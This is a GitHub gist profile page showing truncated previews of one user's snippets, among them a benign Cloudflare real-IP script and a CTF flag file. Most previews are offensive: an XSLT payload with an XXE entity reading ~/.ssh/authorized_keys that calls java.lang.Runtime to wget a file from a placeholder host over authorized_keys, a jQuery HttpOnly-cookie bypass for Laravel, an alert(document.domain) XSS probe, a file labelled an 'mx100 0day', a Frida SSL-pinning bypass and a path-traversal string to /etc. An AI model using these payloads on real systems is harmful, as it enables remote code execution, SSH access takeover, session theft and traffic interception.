Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
View GitHub Profile
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE dtd_sample[<!ENTITY ext_file SYSTEM "file:///home/xxx/.ssh/authorized_keys">]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" omit-xml-declaration="yes"/>
<xsl:template match="/"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">
<root>
<xsl:variable name="cmd"><![CDATA[wget http://xxxx/geldi -O /home/xxx/.ssh/authorized_keys]]></xsl:variable>
<xsl:variable name="rtObj" select="rt:getRuntime()"/>
@numanturle
numanturle / cloudflare-real.sh
Last active August 9, 2022 09:00
cloudflare real ip
#!/bin/bash
# Simple bash script to restore visitor real IP under Cloudflare with Nginx
# Script also whitelist cloudflare IP with UFW (if installed)
if [ "$1" = "--ufw" ]; then
CF_UFW_SETUP="y"
fi
if [ -z "$(command -v curl)" ]; then
echo "####################################"
@numanturle
numanturle / gist:80faab01fb767841db81fe4c98587fdc
Last active December 30, 2024 11:45
laravel bypass http only cookie
$( document ).ready(function() {
$.ajax({
url:"/asd",
method:"POST",
async:true,
xhr: function() {
var xhr = jQuery.ajaxSettings.xhr();
var setRequestHeader = xhr.setRequestHeader;
xhr.setRequestHeader = function(name, value) {
if (name == 'X-Requested-With') return;
@numanturle
numanturle / gist:f8769dcb15d6be2349c410d62d3da9b7
Created August 4, 2020 10:10
orantısız renk kodları
<style>
body {
margin:0 auto;
padding:0 auto;
}
span {
float:left;
margin:0;
padding:0;
alert(document.domain);
@numanturle
numanturle / 0day.php
Last active September 28, 2021 07:32
mx100 0day
<?php
function anim($msg, $time)
{
$msg = str_split($msg);
foreach ($msg as $ms) {
echo $ms;
usleep($time);
}
}
anim("
<?php
$flag = "SODERCTF[C0K_M7_K0L4Y_G3LcI_D3L1_Y1N3_1S_BaSINde_fanta_s3verim]";
function strigToBinary($string)
{
$characters = str_split($string);
$binary = [];
foreach ($characters as $character) {
$data = unpack('H*', $character);
$binary[] = base_convert($data[1], 16, 2);
Java.perform(function() {
var array_list = Java.use("java.util.ArrayList");
var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');
ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log('Bypassing SSL Pinning');
var k = array_list.$new();return k;
}
}, 0);
/../../../../../../../../../../../.././/etc/telephonyProfiles.d/build_date
cat a | tr " " "\n" | uniq | sed '/^[[:space:]]*$/d'